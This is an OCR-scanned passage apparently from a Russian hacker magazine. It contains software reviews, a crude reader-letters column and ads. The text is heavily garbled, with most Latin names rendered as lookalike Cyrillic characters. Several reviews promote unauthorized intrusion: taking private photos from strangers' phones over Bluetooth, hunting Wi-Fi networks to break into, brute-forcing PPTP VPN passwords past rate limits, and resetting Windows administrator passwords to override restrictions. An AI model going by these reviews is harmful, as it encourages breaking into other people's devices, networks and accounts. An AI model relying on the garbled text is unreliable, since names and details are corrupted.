сІос/ПІтІ. Там тебе и описаловка функций ОсопІ, и ОпотеѴРЗ, и ОТК — 
все, что душа пожелает. 

Собственно говоря, Эеѵіпеір — это браузер, заточенный под просмотр до- 
кументации для программистов. В качестве браузерного компонента по 
умолчанию используется дМіІтІ2, а на выбор — МогіІІа/РігеІох (собран- 
ные под ОТК+2). Для работы Эеѵііеір нужны также ОТК+2, дпоте-ѵіз и 
ІіЬдпотеиі. Хотя на мой взгляд, вполне можно было обойтись и одной Оік. 
Чего не хватает программе? Больше настроек и механизма закладок и 
каких-нибудь маркеров текста, как есть плагины к Рігеіох. Строка поиска 
в ЭеѵНеІр вынесена на отдельную вкладку рядом со вкладкой оглавления 
— тоже не совсем удобно, приходится мышью щелкать, чтобы переклю- 
читься. Еще не хватает контекстного меню. Благо, в І_іпих можно копиро- 
вать текст, просто выделяя его. А так в ЭеѵНеІр — ни панели инструмен- 
тов для функций копирования и им подобных, ни менюшки с аналогичны- 
ми функциями. Совершенно спартанский интерфейс. Но удобно. Могу 
поспорить, что есть программисты, которые без этой штуки как без рук. А 
еще ЭеѵНеІр встроена в такие среды разработки, как дЮЕ и Апіиіа. 

КВасІіо 1.0 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 

Размер (в .Ьг2): 2 Мб 

ІіНр://кгасІіо.зоигсеІогде.пеі 

Лицензия: ОШ (ЗРІ_ 



Перепробовав много программ для приема радио с карты ТВ-тюнера, я 
остановил свой выбор именно на КВасІіо. Разумеется, для ее работы те- 
бе нужен настроенный модуль ѴісІео4ипих (Ѵ4І_ и Ѵ4І_2), поскольку сама 
КВасІіо — лишь удобный, заточенный под КОЕ интерфейс к функциям 
драйвера, плюс некоторые дополнительные возможности. 

Среди них, во-первых, такая важная штука, как возможность записи 




звука в форматы МРЗ и ОддѴогЬіз. Но это работает не само по себе, а 
требует наличия библиотек ІіЬтрЗІате и ІіЬодд/ІіЬѵогЬіз. Вторая инте- 
ресная вещь в КВасІіо — плагинная или компонентная архитектура. Все 
разбито на функциональные плагины-компоненты — главное окно, ок- 
но настроек и так далее. Есть также хороший плагин ОиіскВаг, в кото- 
ром отображаются кнопки (можно с пиктограммами) выбранных вами 
программ-каналов. 

Есть также функция сдвига по времени (ТітезИіТіег), когда передача за- 
писывается сначала в большой буфер, а потом воспроизводится. Это 
дает возможность использовать при прослушивании радио своеобраз- 
ный режим «паузы» (кнопка Зіагі/Зіор ЗІеер Соипісіоѵѵп). Из функций, 
относящихся ко времени, в КВасІіо присутствует еще будильник, позво- 
ляющий включать заданную станцию в определенное время. Впрочем 
там есть несколько вариантов: не только воспроизведение по будильни- 
ку, но и прекращение воспроизведения, а также запись в файл и оста- 
новка записи. Полная автоматизация. 

Обычный режим работы КВасІіо «висит» в трее, потребляя 34 мегабай- 
та в Ѵт (а Атагок почти в три раза больше). Может управляться пуль- 
том дистанционного управления через І_ігс. 



СХіпе 

РОЗІХ (*В5Р, Ыпих) 

Размер: 1,0 Мб 

Ііир://5Іаскѵѵаге.регезріт.ги/риЬ/зІаскѵѵаге-10.1/5оигсе/хар/дхіпе/ 
Лицензия: ОШ (ЗРІ_ 



При воспроизведении ЭѴЭ мне важна поддержка Э\Ю-меню, а поскольку 
Мріауег не поддерживает ОѴЭ-меню, приходится использовать другой 
плеер на движке Хіпе, в котором такая возможность реализована. Выбор, 
основанных на Хіпе плееров, достаточно велик. В КОЕ самым известным 
таким является КаІІеіпе, а вот альтернативой ему почему-то считается 
Хіпе-ІІІ с его странным набором виджетов. В ОЫОМЕ есть еще Тоіет, од- 
нако Тоіет предоставляет крайне упрощенный интерфейс к настройкам 
движка Хіпе, а мне такое не подходит. Но существует ОХіпе — добротный, 
сделанный на ОТК+2 фронт-энд к Хіпе. Что в нем хорошего? 

Доступ ко всем опциям Хіпе (возможно, даже более подробный, чем в 
КаІІеіпе). Настройка горячих клавиш на пункты меню. Эффекты и 
фильтры, опять-таки предоставляемые движком Хіпе. Гибкая система 
закладок, позволяющая сделать закладку на текущий фильм и текущее 
время. Плюс достаточно стабильный интерфейс (запоминаются все 
настройки, а не выбо- 
рочно, как в Хіпе-ІІІ). 

Правда, я заметил 
один глюк — если 
много перематывать 
ЭѴО с помощью пол- 
зунка прокрутки, то 
ОХіпе может перес- 
тать откликаться на 
сигналы мыши и кла- 
виатуры, хотя и будет 
продолжать показы- 
вать видео. В таком 
случае остается разве 
что завершить про- 
цесс ОХіпе и переза- 
пустить этот плеер. Но 
в целом Охіпе — один 
из лучших плееров на 
движке Хіпе. 
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ВТ-Оеѵісез Ѵіеѵѵег ѵ.О.ІЭа 

УУІПСІОѴѴЗ 

Ргееѵѵаге 

5І2ѳ: 340 Кб 

ѵѵѵѵѵѵ.ЬІие)аск.ги 



Блюджекинг развивается. Причем настолько быстро и бурно, что порой да- 
же не успеваешь за ним уследить. Еще недавно мы обсуждали, насколько 
это здорово — скачать файлы с чужого телефона, после чего с интересом 
рассматривать приватные фотки и контакты. И вот уже сегодня все поме- 
нялось, став намного серьезнее. ВІиеІооШ-модулем оснащаются все боль- 
ше и больше самых разнообразных устройств, начиная от КПК и заканчи- 
вая МРЗ-плеерами с беспроводными наушниками. Такое разнообразие уст- 
ройств, с одной стороны, предоставляют хакерам больше возможностей, но 
с другой — массу новых сложностей и проблем. Не надо объяснять, что под- 
ходы ко взлому древнего мобильника (ЗопуЕгісззоп Т610, например) и на- 
вороченного КПК несколько отличаются. Да и как не запутаться в той мас- 



се устройств, которые ты разом можешь найти, просканировав эфир в люд- 
ном месте? Здесь-то тебе и пригодится утилита ВТ-Оеѵісез Ѵіеѵѵег ѵ.О.ІЭа, 
написанная нашими соотечественниками с сайта шш.Ыиеіаск.ги. Эта кро- 
хотная тулза ведет журнал, найденных с помощью ВТ-модуля устройств, 
собирает о них информации и выводит ее в удобной форме на экран. Иден- 
тификатор устройства (имя), уникальный МАС-адрес, время обнаружения, 
класс устройства — такой наборчик уже впечатляет, правда? А ведь прог- 
рамма показывает еще, и какое именно устройство было найдено. Да, то- 
же самое можно сделать и вручную, «пробив» МАС-адрес девайса в Сети, 
но с появлением ВТ-Оеѵісез Ѵіеѵѵег такая необходимость отпадает. В отче- 
те, составленном программой, четко обозначено, является ли девайс све- 
жей Ыокіа'ей или же каким-нибудь наладонником. Знающие люди, возмож- 
но, напомнят мне о существовании специализированных прог, которые поз- 
воляют замаскировать свой девайс под какой-либо другой. За примером 
далеко ходить не надо: взять хотя бы известную тулзу для Раіт'ов — 
ВТСІазз (ѵѵтѵ.тиіііпег.огд). Однако ни она, ни любая утилита не сможет 
сбить с толку идентификационную систему ВТ-Оеѵісез Ѵіеѵѵег, которая все 
равно определит истинное наименование ВІиеІооШ-устройства. 




ДОСТУП **•*••* 

по &ы деленному А ЛѴ 



А г МОСЕІЕ 

ЫН.-, 



Мбит 
в сек 



Подключение - от 40 у.е 

Минимальная меси и пн лп-ата - 5 у.е. 

Срок подключе НИН - Т 4 дней ^дпн Москвы) 

Специальные Скидки для іійОішнюе в жиПых дома’' 

Организация виртуальных частных сетей 4ѴРМ) 

круглосуточная техническая поддержка 

Аренда о&орудоуінл й для абонентов - бесплатно 

Виртуальный и физическим хостинг 

шеь-сйрмдав - трефик не ограничен 



Электронная почта для абонентов - бесплатно 

ФОРУМ 



(ОЧЬ) 741 -ООИ 
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Кі$те1-2005-08-П1 

Ыпих 

ОШ ОРІ. 

Зіге: 924 Кб 

ѵѵѵѵѵѵ.ЬІиеіаск.ги 



ВІиеІооІП — это, безусловно, хорошо. Но все же значительно больший 
интерес представляют беспроводные сети. Ну, как можно пройти мимо 
такого лакомства, как бесплатный инет (иногда с широчайшим кана- 
лом), конфиденциальной информации или, если особенно повезет, 
мощной системы распределенных вычислений (кластера)? Да никак... :) 
Любая атака на беспроводные сети начинается с их обнаружения. Хаке- 
ру необходимо каким-то образом просканировать эфир и поймать сигнал 
от находящихся поблизости точек доступа. Обычно для этого использу- 
ют ноутбук, ѴѴі-Рі адаптер, работающий в разных диапазонах, всесторон- 
нюю отпі-антенну и мегаизвестную программу Кізтеі. Последняя предс- 
тавляет собой универсальное средство и включает в себя детектор 
802.11 (а,Ь,д) беспроводных сетей и снифер сетевых пакетов. В отличие 
от многих других программ, напрямую связанных с ѴѴі-Рі, Кізтеі поддер- 
живает более 20 типов карт и, вообще говоря, совместима с любым де- 
вайсом, поддерживающим гаѵѵ топііогіпд (гітоп) режим. Сразу после за- 
пуска, утилита начинает пассивно сканировать эфир и собирать переда- 
ваемые «по воздуху» пакеты. Признаться, в чистом виде от этих пакетов 
толку мало. Но зато Кізтеі умеет анализировать их и выдавать массу по- 
лезной информации. Передвигаясь по городу, ты легко сможешь обнару- 
жить ѴѴі-Рі сети, автоматически занести их расположение в базу данных 
(например, обозначить на карте, используя координаты с ОРЗ-модуля), 
определить диапазоны используемых в локалке ІР-адресов и т.д. От 
Кізтеі не ускользнут даже те точки доступа, которые работают в так на- 
зываемом скрытом фібсіеп) режиме. А в некоторых случаях прога выяснит 
даже конкретную модель 
используемого оборудова- 
ния, что, естественно, при- 
годится для взлома. Но и 
это еще не все. Кізтеі впе- 
чатлит тебя еще больше, 
когда узнаешь, что многие 
успешно используют ее не 
для атаки, а для защиты. А 
почему, собственно, нет? 

Если она так хорошо скани- 
рует эфир, значит, ее эф- 
фективно можно приме- 
нять для поиска посторон- 
них девайсов. Анализируя 
данные с различных точек 
доступа/ѴѴі-Рі карт и ис- 
пользуя связку Кізтеі + 

Зпогі, можно наладить та- 
кую защиту, которая смо- 
жет дать отпор даже опыт- 
ному хакеру. 

ТНС-ррІр-ЬгиІег 0.1.4 

Ыпих 

ОШ ОРІ. 

Зіге: 93 Кб 




ѵѵѵѵѵѵ.ІІю.огд 



Кто сказал, что подобрать пароль к ѴРІМ-аккаунту невозможно из-за осо- 
бенностей авторизации? Чушь! Парни из всемирно-известной хакерской 
группы ТНС уже давно доказали обратное, выпустив риЫіс-релиз тулзы 
ТНС-ррІр-ЬгиІег. Данная прога представляет собой узкоспециализиро- 
ванный брутфорсер для РРТР-протокола (1723ЯСР), который действи- 
тельно работает! :) Правда, только в том случае, когда сервер использу- 
ют авторизацию Місгозоіі ѴѴіпбоѵѵ СПар М2. Спешу обрадовать: чаще все- 
го используется именно она, причем как на ѴѴіпсІоѵѵз серверах, так и на 
серьезных СІЗСО-системах. Что касается старой ѴѴіпбоѵѵ СПар VI, то ее 
поддержка, возможно, появится в следующих версиях программы. 
Проблема реализации брутфорса заключается в том, что Місгозоіі намерен- 
но реализовала в РРТР-протоколе систему защиты против брутфорса. Если 
не вдаваться в подробности, то ее смысл заключался в установке ограниче- 
ния: «за одну секунду можно ввести только один пароль». Естественно, что 
с такой скоростью перебора хакер далеко не уедет и шансы подобрать па- 
роль будут сведены к нулю. Однако в реализации по традиции не обошлось 




без изъянов, которые были опубликованы на багтраках, а группа ТНС ус- 
пешно заюзала их в конкретной программе. С помощью ТНС-ррІр-ЬгиІег 
можно обойти ограничения, установленные Місгозоіі, и добиться скорости 
более чем 300 — 400 паролей в секунду. Эта цифра, естественно, сильно 
варьируется в зависимости от задержки в доставке пакетов до сервера, 
так что наибольшей скорости можно добиться в локальной сети. Огорчает 
лишь то, что для работы ррІр-ЬгиІег необходима пара сторонних библиотек. 
Без них программа попросту не скомпилируется (смотри скриншот). 

ОНІіпе ЫТ РаззѵѵогсІ & 

Яедізігу Есіііог 

Ыпих 

ОШ ОРІ. 

Зіге: 3 Мб (Ьооі-ссі) 

[Шр://Ііоте.еипег.по/~рпогбаІіІ/пфаззѵѵб/ 



Проникновение в удаленную систему — это искусство. Но локальный 
взлом машины, когда она находится непосредственно перед тобой, — 
это совсем другая история. Администраторы очень часто ограничивают 
права обычных пользователей и тем более гостевой учетной записи, что 
приносит массу неудобств. Начинаешь устанавливать прогу — облом. 
Пытаешься зайти в системную папку винды — та же история. Тут-то и 
начинаешь задумываться, каким образом эту несправедливость можно 
исправить. Ответ прост — завладеть аккаунтом администратора. 

Сразу скажу: если машина подключена в сеть с контроллером домена или 
работающей службой каталогов (Асііѵе Оігесіогу), то прыгнуть выше головы 
можно даже не пытаться. Из этой затеи все равно ничего хорошего не вый- 
дет, так как данные об учетных записях в этом случае централизованно 
хранятся на сервере, и добраться до них ты, скорее всего, не сможешь. 
Совсем другое дело, когда компьютер работает в рабочей группе или вооб- 
ще не подключен к сети. Тут уже, как говорится, дело в шляпе. Достаточно 
до загрузки винды считать 8АМ-файл с системного раздела и вытащить от- 
туда зашифрованный пасс администратора. Или пароль администратора 
можно попросту обнулить. Эта задача превращается в сущий пустяк, если 
под рукой есть ОТТІіпе ІЧТ РаззѵѵогсІ & Ведізігу Есіііог. Пакет распространяет- 
ся в виде образа миниатюрной І_іпих-ЬазесІ операционной системы, кото- 
рую нужно записать на СО и использовать во время загрузки компьютера. 
Загрузившись с такого диска, ты увидишь специальную консольную обо- 
лочку, с помощью которой и осуществляется требуемое действие. Нужно 
лишь внимательно изучить инструкцию и правильно указать параметры 
ѴѴіпсІоѵѵз-системы — прога сразу предложит обнулить заветный пароль © 










Хочешь фирменный лого на свой сотовый? 
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ВРАЧТЕРАПЕВТ 
Вскрытие писем провел 
Ог.КІоипіг (тада 2 іпе@геаІ.хакер.ги) 
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ПРИВЕТСТВУЮ, ДОРОГИЕ НАШЕМУ КОЛЛЕКТИВНОМУ РЕДАКЦИОННОМУ СЕРДЦУ ПИСЬМОПИСЕТЕЛИ И 
КРЕАТИВЩИКИ! ЕСЛИ ЧЕСТНО, В ЭТОТ РАЗ Я ИСПРАВЛЯЛ НЕКОТОРЫЕ (НЕ ВСЕ, ЧТОБЫ НЕ ТЕРЯТЬ ЭФФЕКТА) 
ОРФОГРАФИЧЕСКИЕ ОШИБКИ В ВАШИХ ПИСЬМАХ. НИЧЕГО НЕ МОГУ С СОБОЙ ПОДЕЛАТЬ, ИНАЧЕ БОЮСЬ, ЧТО 
ДАЖЕ БУМАГА ЭТОГО НЕ СТЕРПИТ :). НУ ДА НЕ БУДЕМ О ГРУСТНОМ. ПОЕХАЛИ ЧИТАТЬ! 



Ггот: Ыікііа І_ 02 Іікіп [сІгеатпік@таіІ.ги] 

§иЬі: Ударьте! 

Люди, а работаете в одном здании с редакцией Хакер ЗресіаІ ? Если да, 
то УДАРЬТЕ их редактора СО ! 

Заранее спасибо! 

Р.З. а лучше два раза! 

Ве: Привет! Работаем в одном здании, это точно. К сожалению, уда- 
рить его прямо сейчас не получится, поскольку в данный момент он 
председательствует на очередной сессии ЮНЕСКО по «проблемам 
подростковой мастурбации и иных способов добрачного удовлетворе- 
ния сексуальной потребности». Кстати, однажды команда дизайнеров 
Хакера побила его за то, что он с помощью им же изобретенного фиб- 
рооптического порноскопа подглядывал за литературным редакто- 
ром, да еще и выложил это видео на чешский хоум-мейд порноресурс. 
Так вот, побили они его резиновыми шлангами, а он вчинил им иск в 
Гаагский трибунал. Так они пока и судятся. Правда, адвокатша от не- 
го отказалась (во время заседания он каким-то образом проник теле- 
фоном к ней под юбку и тут же выложил фото на тот же сайт), но он 
и сам неплохо защищается. 

Р.З Последний апдейт перед сдачей номера: 

Скай прочитал это письмо и считает, что у тебя очень сексуальная фа- 
милия — ведь она происходит от предмета, который берут в рот! Сроч- 
но напиши ему на личную почту. 



Ггоѵп: Иван Головинов [фдгісІ@таіІ.ги] 

8иЬ|: Восстановление 
Привет хакеры. 

Такая проблема; как можно восстановить файлы на форматированном 
диске. Сам я делаю музыку и исходные файлы. ДА, как-то вы писали 
чтоб вам присылали музыку, с удовольствием, но позже. 

Ребята если не затруднит ответьте на мой таіІ-О^ВЮ@таіІ.ги 
Ну мой музон на ПЕАІ_МІІЗІС.ПІІЛіиСВЮ 
С уважением Ои ОВЮ. 

Ве: Йо, диджей! Пару пластинок — потом стриптиз, поскольку не могу я 
понять, зачем форматировать, если собрался потом восстанавливать 
Отформатировал — значит такова их судьба, значит — туда им и дорога, 
ведь форматирование диска — это ответственный, серьезный шаг и в 
моральном становлении компьютерщика его можно сравнить с потерей 
девственности. Вообще-то, восстановить файлы на нормально отформа- 
тированном диске — великий геморрой есть. Вот, например, когда мы 
все были молодыми, существовала прога Ыогіоп Заіе Рогтаі, после фор- 
матирования которой все очень круто поднималось из мертвых. Сейчас 
есть технологии восстановления информации, о которых ты можешь 
прочетать в нашем спецвыпуске (ШрУ/ѵѵѵѵѵѵ. хакер. ги/тадалпе/хз/046/). 
Музыку присылай, выложим ее на диск (на всеобщее обозрение), а то 
что-то народ расстраивается, когда я ставлю им «Рогатых Трупоедов» 
или «АпаІ ВІеесІіпд». Странные, подозрительные люди :(. 



Ггот: ІІзег апопутоз 

ЗиЬ|: 

Ргіѵѵеі! Висіи осНеп ргегпаіеіеп езіі росізкагіпііе как игпаі раззѵѵогсі па 
ѵѵѵѵѵѵ.ИоІтаіІ.сот (Моіа зезіга росіоггеѵѵаіеі зѵѵоіедо рагпіа ѵѵ сііет Іо ..і 
Посііеі игпа* и педо рагоі). Ла зкагаі сПІо ротоди. а зат 2 Ііе пісііегіа ѵѵ 
еіот пе зтузііи :( 

2агаппіе Ыадосіагеп! 5 иѵѵагИепует Апсігеі 

Ве: Жил-был на свете маленький кардер. И говорила ему мама: «Учи, 
сынок, русские буквы, не то ты прослывешь риппером, даже не будучи 
им! Учи, сынок, буквы кириллицы и учись русифицировать свои оси, 
ведь американскую винду для своих черных дел ты сможешь крутить на 
виртуальной машине! Запомни, сынок, что па Ігапзіуіе різІпіЛ Іоіко 
кібаіу!». Когда он не слушался, она ставила его в угол и била по губам 
колодой белого пластика. К чему это я? А к тому, что письмо твое я оси- 
лил, но весьма фрагментарно. Итак, в чем же плохом сестра подозрева- 
ет своего парня? Может быть, в торговле органами неродившихся де- 
тей? В поедании трупов мертвых животных? В поджогах не Черкизовс- 
ком рынке? В том, что он съел ее ароматное мыло в виде кусочка арбу- 
за? Хочет ли она об этом поговорить? Готова ли она к психотерапии с 
использованием Эриксоновского гипноза? Необходимо прояснить все 
эти вопросы. 

Ггот: Эеп [сІептого 2 @диаке.ги] 

5иЬ|: Помогите! 

Пишу троян на Оеірііі. Возник вопрос: знаю в ѴѴіпЗоск есть функция Ііз- 
іеп. Как ее использовать? (Если можно с примером ) 

Ве: Зачем тебе это, друг мой! Писать трояны — это не путь Дао. Рас- 
слабься! Не напрягайся — и будет тебе дано, не ищи — и обрящешь. А 
если будешь напрягаться — оппаньки тебе (с). Вот, например, в 
ѵѵіпіпеі.сііі есть функция ІпІегпеЮгаскІІгІ. Интересно? Хочешь меня спро- 
сить о ней? А вот не скажу, ибо читай доки, они — рулез, как говорит 
другая мудрость. Кстати, ты в курсе статьи 273? Да, писать трояны — 
очень плохо и мы такими вещами не занимаемся и заниматься не хо- 
тим, поскольку не хакеры, а журналисты. У меня, например, вообще нет 
компьютера, у меня на него аллергия. Этот ответ я тебе пишу на меха- 
нической машинке «Ятрань», поскольку на электрические поля у меня 
тоже аллергия, они сбивают имплантированные в мой организм низко- 
омные мозгоусилительные транзисторы. 

Ггот: Адамский К. В. [ЬаіІеу@рос 2 Іа.опеГрІ] 

$иЬ|: Внесудебный возврат любых долгов 

Окажет Вам Профессиональную помощь по уголовным, гражданским, 
арбитражным, бракоразводным делам. Все виды услуг частной детек- 
тивной и охранной деятельности ! 

Ве: Вот как, значит. Агентство Аль Капоне вернет долги и расформиру- 
ет любую фирму? Как говорится, после прочтения этого письма вам за- 
хочется взять в руки Тотту-Оип, надеть малиновый пиджак и пустить 
пальцы веером. Вот только интересно, как осуществляются бракораз- 
водные процессы? Бетонные сапоги — ив Темзу? Катком в асфальт, 
очередь из Тотту Сип крест-накрест? :) 

Ггот: ОагпеІІ [адаті@таіІ.сот] 

§иЬі: такого нет ни у кого 

Именной камень — оригинальный подарок, который никогда не надоест 
Ве: За что я люблю спамо-авторов, спамо-посылателей и прочих спа- 
мо-генераторов — так это за их фантазию и самокритику. Действи- 
тельно, дорогие товарищи, очень многие читатели данного креатива 
скинулись бы Вам на такой подарок. Который Вам никогда не надоест. 
Хотя можно ограничиться и просто табличкой с именем и датой. Либо 
поставить простенький такой камешек. С другой стороны, можно огра- 
ничиться передачей тела в анатомический музей для исследования и 
бесчеловечных экспериментов над мозгом типичного спаммера. 
Просто, но весьма оригинально, и все равно никогда нам не надоест, 
несмотря на отсутствие каких-то научных выводов! В общем, заходите 
в нашу прозекторскую. 

Ггот: Ыікііа І_ 02 Іікіп [бгеатпік@таіІ.ги] 

§иЬі: Антивирусы 

Здравствуйте уважаемая редакция ][ ! У меня вопрос, даже претензия! 
Почему вы меняете антирус, которым проверяли диск? То это Касперс- 
кий, до др. веб? Вот вам-то легко, а мне переустанавливать не охота! 
Каждый раз ставишь, проверяешь, потом снова ставишь. ..Вы уж как-ни- 
будь определитесь, самодельный, что ли, поставьте! Тогда я хоть пере- 
устанавливать не буду :) 

Р.З. ну а если серьезно (вот всегда мы так — вначале плетём чего попало) 
то нафиг вообще эти файлы отчёта? Не было бы их Вы бы поимели больше 



свободного времени и места на диске тоже (бррррр! в смысле сэкономили!). 
Ве: Итак, снова перед нами лежит письмо от недовольного товарища 
Ложкина. Напомним, что поначалу этот господин был недоволен ре- 
дактором диска братского журнала, а теперь высказывает претензии 
и к нашему. Сначала мне даже показалось, что автор послания, про- 
должая тему предыдущих писем, подсознательно исповедует нацис- 
тские мысли («антирус» — это же типичная опечатка по Фрейду!). Од- 
нако не будем отвлекаться. Итак, антивирус мы меняем нечасто. Ни- 
чего плохого в переходе на Веба я не вижу :). А логи мы постим для 
того, чтобы Вы не пугались и не писали нам следующего: «Вот, мой 
антивирус обнаружил злой вирус поІ-а-ѵігиз.МІВС.6.16, Вы что там, 
вообще оборзели? Хакнуть меня хотите, да? Всю страну вирусами за- 
рядить желаете? Ага, вот как? Хакеры, да? Ну уж нет, накося-выкуси, 
и мы не лыком шиты»! А так — прочитаете отчет и поймете, что мы 
никого не обманываем :). 

Ггот: Денис [а20І59.84@таіІ.ги] 

§иЬ|: от читателя 
Здравствуйте дорогая редакция! 

Я хочу изучить ассемблер, не могли бы вы мне подсказать, по каким 
книгам это лучше всего сделать, книг сейчас много а какую лучше выб- 
рать мне неизвестно. 

Очень прошу посоветуте мне с выбором. 

С уважением. 

Денис. 

Ве: Привет, дорогой читатель Денис! Скачай в инете книгу Питера 
Абеля «Ассемблер и программирование для ІВМ РС» и для начала 
попробуй воткнуть в нее. Давным-давно для начинающих она была 
очень крута. Сейчас — не знаю, с ассемблером я покончил давно, и 
знания мои в нем были невелики, я как-то больше предпочитал РазсаІ 
с вставочками на асме :). А вообще-то, не забывай читать нашу руб- 
рику Кодинг — там же ассемблер присутствует ежемесячно, а на вы- 
носках всенародно любимый Крис Касперски нередко публикует и 
«что почитать». 

Ггот: Федосов Евгений Вячеславович [Іеѵ@аго1.пеІ] 

8иЬ|: ѴѴіпРЕ 
Здравствуйте, 

Я на досуге сделал ѴѴіпРЕ, и мне очень хотелось бы чтобы образ моего 
творения вы опубликовали вместе со сравнительной статьёй в вашем 
журнале. Образ 210 мегабайт (как раз на маленькую компашку). Его 
врят-ли можно использовать как ЫѵеСО но средств для восстановления 
лучше я не видел. 

Очень надеюсь что Вас это заинтересует. 

С уважением Евгений Федосов 

Ве: Да не вопрос, Евгений Вячеславович! Мы всегда рады посмот- 
реть на успехи читателей, только не очень понятно, где твой труд ка- 
чать ;). Поэтому срочно шли линк нашему Степану Ильину (редактору 
диска), мы заценим твое творение, и если оно нам понравится (и бу- 
дет соответствовать авторским правам людей, чьи программы ты ту- 
да интегрировал), то выложим на диск. Ну а если это реальный и злой 
варез — тут мы тебе не помощники, поскольку очень уважаем чужую 
интеллектуальную собственность :). В общем, ждем образа, судя по 
описанию (которое в журнал не вошло из-за своего царского 
размера) — вещь достойная © 
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Побывал в далеких странах? 
Накопилось много интересных 
сЬотогоаЛий? 



фото таіі.ги 

Ваш личный цифровой фотоархив! 



1 ... Доступ ИЭ любой точки Миро 
2 . удобно» с нс гомо альбомов 



3 Редактирование фотографий 

4 возможность оіроиичения доступа только для друзей 

5 Рейтинги лучших фотографий 

4 Творческие конкурсу с призами 



Создай свой цифровой фотоархив на 
ЬНрг/ЛоІо.тс и покажи друзьям! 






ТрГдтКОМР700Р^ 

Абсолютно плоский экран 
Размер точки 0,24 мм 
Частота развертки 95 кГ ц 
Экранное разрешение 1600x1200 
ІІ8В-интерфейс 



Оіпа Ѵісіогіа 



(095) 6Ю-6І-17, 68*-2?-65 

\ѵ\ѵ\ѵ аѵс омр.гш 



Москва: АБ-групп (095) 745-5175; Акситек (095) 784-7224; Банкос (095) 128-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 176-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1158 
Компьютерный салон ЗМ5 (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; 0ЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490 
СКИД (095) 232-3324; Тринити Электронике (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; РІаке (095) 236-992; Рогсе Сотриіегз (095) 775-6655 
І5М (095) 718-4020; Меі]іп (095) 727-1222; N7 Сотриіег (095) 970-1930; Р-ЗІуІе Тгабіпд (095) 514-1414; ІІ5Ы Сотриіегз (095) 755-8202; ІЛ.ТВА Сотриіегз (095) 729-5255; ЭЛЕКТОН (095) 956-3819 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 
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